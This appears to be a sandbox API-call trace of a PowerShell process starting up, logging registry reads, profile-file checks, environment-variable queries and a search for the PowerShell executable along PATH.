	[0863.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0863.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0863.454] VirtualQuery (in: lpAddress=0x16be40, lpBuffer=0x16cd00, dwLength=0x30 | out: lpBuffer=0x16cd00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0863.459] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dc98 | out: phkResult=0x16dc98*=0x300) returned 0x0
	[0863.460] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dc1c, lpData=0x0, lpcbData=0x16dc18*=0x0 | out: lpType=0x16dc1c*=0x1, lpData=0x0, lpcbData=0x16dc18*=0x56) returned 0x0
	[0863.460] CoTaskMemAlloc (cb=0x5a) returned 0x1b758270
	[0863.460] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dbec, lpData=0x1b758270, lpcbData=0x16dbe8*=0x56 | out: lpType=0x16dbec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dbe8*=0x56) returned 0x0
	[0863.460] CoTaskMemFree (pv=0x1b758270) 
	[0863.460] RegCloseKey (hKey=0x300) returned 0x0
	[0863.460] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dc98 | out: phkResult=0x16dc98*=0x300) returned 0x0
	[0863.460] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dc1c, lpData=0x0, lpcbData=0x16dc18*=0x0 | out: lpType=0x16dc1c*=0x1, lpData=0x0, lpcbData=0x16dc18*=0x56) returned 0x0
	[0863.460] CoTaskMemAlloc (cb=0x5a) returned 0x1b758270
	[0863.460] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dbec, lpData=0x1b758270, lpcbData=0x16dbe8*=0x56 | out: lpType=0x16dbec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dbe8*=0x56) returned 0x0
	[0863.460] CoTaskMemFree (pv=0x1b758270) 
	[0863.461] RegCloseKey (hKey=0x300) returned 0x0
	[0863.461] CoTaskMemAlloc (cb=0x20c) returned 0x1b72d930
	[0863.461] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b72d930 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0863.461] CoTaskMemFree (pv=0x1b72d930) 
	[0863.461] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0863.461] CoTaskMemAlloc (cb=0x20c) returned 0x1b72d930
	[0863.462] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b72d930 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0863.462] CoTaskMemFree (pv=0x1b72d930) 
	[0863.462] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0863.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0863.462] SetErrorMode (uMode=0x1) returned 0x1
	[0863.463] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc00 | out: lpFileInformation=0x16dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0863.463] SetErrorMode (uMode=0x1) returned 0x1
	[0863.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0863.463] SetErrorMode (uMode=0x1) returned 0x1
	[0863.463] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc00 | out: lpFileInformation=0x16dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0863.464] SetErrorMode (uMode=0x1) returned 0x1
	[0863.464] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0863.464] SetErrorMode (uMode=0x1) returned 0x1
	[0863.464] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc00 | out: lpFileInformation=0x16dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0863.464] SetErrorMode (uMode=0x1) returned 0x1
	[0863.464] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0863.464] SetErrorMode (uMode=0x1) returned 0x1
	[0863.464] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc00 | out: lpFileInformation=0x16dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0863.464] SetErrorMode (uMode=0x1) returned 0x1
	[0863.465] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0863.465] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.465] CoTaskMemFree (pv=0x2b4e60) 
	[0863.466] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0863.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.466] CoTaskMemFree (pv=0x2b4e60) 
	[0863.466] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0863.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.466] CoTaskMemFree (pv=0x2b4e60) 
	[0863.467] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0863.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.467] CoTaskMemFree (pv=0x2b4e60) 
	[0863.468] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0863.468] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.468] CoTaskMemFree (pv=0x2b4e60) 
	[0863.469] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0863.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.469] CoTaskMemFree (pv=0x2b4e60) 
	[0863.470] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0863.471] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x16dde0 | out: lpMode=0x16dde0) returned 1
	[0864.338] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0864.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.338] CoTaskMemFree (pv=0x2b4e60) 
	[0864.342] SetEvent (hEvent=0x314) returned 1
	[0864.342] SetEvent (hEvent=0x300) returned 1
	[0864.342] SetEvent (hEvent=0x388) returned 1
	[0864.342] SetEvent (hEvent=0x310) returned 1
	[0864.344] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0864.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.344] CoTaskMemFree (pv=0x2b4e60) 
	[0864.344] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16db38 | out: phkResult=0x16db38*=0x344) returned 0x0
	[0864.344] RegQueryValueExW (in: hKey=0x344, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16dabc, lpData=0x0, lpcbData=0x16dab8*=0x0 | out: lpType=0x16dabc*=0x0, lpData=0x0, lpcbData=0x16dab8*=0x0) returned 0x2

Thread:
	id = 240
	os_tid = 0xcf8


Thread:
	id = 252
	os_tid = 0xd44


Thread:
	id = 786
	os_tid = 0xa70


Thread:
	id = 791
	os_tid = 0x101c


Thread:
	id = 1161
	os_tid = 0x1754


Thread:
	id = 1178
	os_tid = 0x14ac


Thread:
	id = 1179
	os_tid = 0xcbc

	[0592.595] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0783.209] LocalFree (hMem=0x2072b0) returned 0x0
	[0783.210] LocalFree (hMem=0x2072d0) returned 0x0
	[0783.210] CloseHandle (hObject=0x300) returned 1
	[0783.210] CloseHandle (hObject=0x13) returned 1
	[0783.211] CloseHandle (hObject=0xf) returned 1
	[0783.211] RegCloseKey (hKey=0x2ec) returned 0x0
	[0783.212] RegCloseKey (hKey=0x2e8) returned 0x0
	[0783.212] RegCloseKey (hKey=0x2e4) returned 0x0
	[0792.585] RegCloseKey (hKey=0x2ec) returned 0x0
	[0805.531] RegCloseKey (hKey=0x2ec) returned 0x0
	[0848.653] RegCloseKey (hKey=0x384) returned 0x0
	[0848.653] RegCloseKey (hKey=0x380) returned 0x0
	[0848.654] RegCloseKey (hKey=0x35c) returned 0x0
	[0848.654] RegCloseKey (hKey=0x398) returned 0x0
	[0848.654] RegCloseKey (hKey=0x378) returned 0x0
	[0848.655] RegCloseKey (hKey=0x374) returned 0x0
	[0848.655] RegCloseKey (hKey=0x370) returned 0x0
	[0848.655] RegCloseKey (hKey=0x36c) returned 0x0
	[0848.655] RegCloseKey (hKey=0x368) returned 0x0
	[0848.656] RegCloseKey (hKey=0x364) returned 0x0
	[0848.656] RegCloseKey (hKey=0x360) returned 0x0
	[0848.656] RegCloseKey (hKey=0x338) returned 0x0
	[0848.656] RegCloseKey (hKey=0x394) returned 0x0
	[0848.657] RegCloseKey (hKey=0x390) returned 0x0
	[0848.657] RegCloseKey (hKey=0x358) returned 0x0
	[0848.657] RegCloseKey (hKey=0x354) returned 0x0
	[0848.658] RegCloseKey (hKey=0x350) returned 0x0
	[0848.658] RegCloseKey (hKey=0x34c) returned 0x0
	[0848.658] RegCloseKey (hKey=0x348) returned 0x0
	[0848.659] RegCloseKey (hKey=0x344) returned 0x0
	[0848.659] RegCloseKey (hKey=0x340) returned 0x0
	[0848.659] RegCloseKey (hKey=0x33c) returned 0x0
	[0848.659] RegCloseKey (hKey=0x38c) returned 0x0
	[0848.660] RegCloseKey (hKey=0x32c) returned 0x0
	[0848.660] RegCloseKey (hKey=0x328) returned 0x0
	[0848.660] RegCloseKey (hKey=0x324) returned 0x0
	[0848.661] RegCloseKey (hKey=0x320) returned 0x0
	[0848.661] RegCloseKey (hKey=0x31c) returned 0x0
	[0848.661] RegCloseKey (hKey=0x318) returned 0x0
	[0848.661] RegCloseKey (hKey=0x314) returned 0x0
	[0848.662] RegCloseKey (hKey=0x310) returned 0x0
	[0848.662] RegCloseKey (hKey=0x388) returned 0x0
	[0848.662] RegCloseKey (hKey=0x300) returned 0x0
	[0848.662] RegCloseKey (hKey=0x2ec) returned 0x0
	[0875.391] RegCloseKey (hKey=0x344) returned 0x0

Thread:
	id = 1221
	os_tid = 0xc8c


Thread:
	id = 1870
	os_tid = 0x24cc

	[0865.151] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0865.157] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0865.162] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0865.162] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.162] CoTaskMemFree (pv=0x2b4e60) 
	[0865.164] VirtualQuery (in: lpAddress=0x1c6ed820, lpBuffer=0x1c6ee6e0, dwLength=0x30 | out: lpBuffer=0x1c6ee6e0*(BaseAddress=0x1c6ed000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0865.167] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0865.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.167] CoTaskMemFree (pv=0x2b4e60) 
	[0865.173] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0865.173] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.173] CoTaskMemFree (pv=0x2b4e60) 
	[0865.176] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0865.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.176] CoTaskMemFree (pv=0x2b4e60) 
	[0865.186] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0865.186] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.186] CoTaskMemFree (pv=0x2b4e60) 
	[0865.189] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0865.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.189] CoTaskMemFree (pv=0x2b4e60) 
	[0865.190] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0865.190] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.190] CoTaskMemFree (pv=0x2b4e60) 
	[0865.196] VirtualQuery (in: lpAddress=0x1c6edad0, lpBuffer=0x1c6ee990, dwLength=0x30 | out: lpBuffer=0x1c6ee990*(BaseAddress=0x1c6ed000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0865.196] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0865.196] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.197] CoTaskMemFree (pv=0x2b4e60) 
	[0865.199] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0865.199] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.199] CoTaskMemFree (pv=0x2b4e60) 
	[0865.200] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0865.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.200] CoTaskMemFree (pv=0x2b4e60) 
	[0865.201] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0865.201] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.201] CoTaskMemFree (pv=0x2b4e60) 
	[0865.206] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0865.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.206] CoTaskMemFree (pv=0x2b4e60) 
	[0866.378] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0866.378] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.378] CoTaskMemFree (pv=0x2b4e60) 
	[0866.380] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0866.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.381] CoTaskMemFree (pv=0x2b4e60) 
	[0866.382] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0866.382] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.382] CoTaskMemFree (pv=0x2b4e60) 
	[0866.385] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0866.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.385] CoTaskMemFree (pv=0x2b4e60) 
	[0866.386] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0866.386] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.386] CoTaskMemFree (pv=0x2b4e60) 
	[0866.388] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0866.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.388] CoTaskMemFree (pv=0x2b4e60) 
	[0866.390] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0866.390] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.390] CoTaskMemFree (pv=0x2b4e60) 
	[0867.159] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0867.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.160] CoTaskMemFree (pv=0x2b4e60) 
	[0867.970] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0867.970] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0867.970] CoTaskMemFree (pv=0x2b4e60) 
	[0868.584] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0868.585] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0868.585] CoTaskMemFree (pv=0x2b4e60) 
	[0868.585] CoTaskMemAlloc (cb=0x128) returned 0x26a080
	[0868.585] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x26a080, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0868.585] CoTaskMemFree (pv=0x26a080) 
	[0868.589] CoTaskMemAlloc (cb=0x20e) returned 0x1b72f370
	[0868.589] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b72f370 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0868.589] CoTaskMemFree (pv=0x1b72f370) 
	[0868.593] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0868.594] SetErrorMode (uMode=0x1) returned 0x1
	[0868.597] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0869.584] SetErrorMode (uMode=0x1) returned 0x1
	[0869.585] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0869.586] SetErrorMode (uMode=0x1) returned 0x1
	[0869.586] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0872.370] SetErrorMode (uMode=0x1) returned 0x1
	[0872.372] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0872.372] SetErrorMode (uMode=0x1) returned 0x1
	[0872.372] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0872.380] SetErrorMode (uMode=0x1) returned 0x1
	[0872.381] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0872.381] SetErrorMode (uMode=0x1) returned 0x1
	[0872.381] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0872.389] SetErrorMode (uMode=0x1) returned 0x1
	[0872.391] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ed860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0872.391] SetErrorMode (uMode=0x1) returned 0x1
	[0872.391] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c6eda00 | out: lpFindFileData=0x1c6eda00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0872.399] SetErrorMode (uMode=0x1) returned 0x1
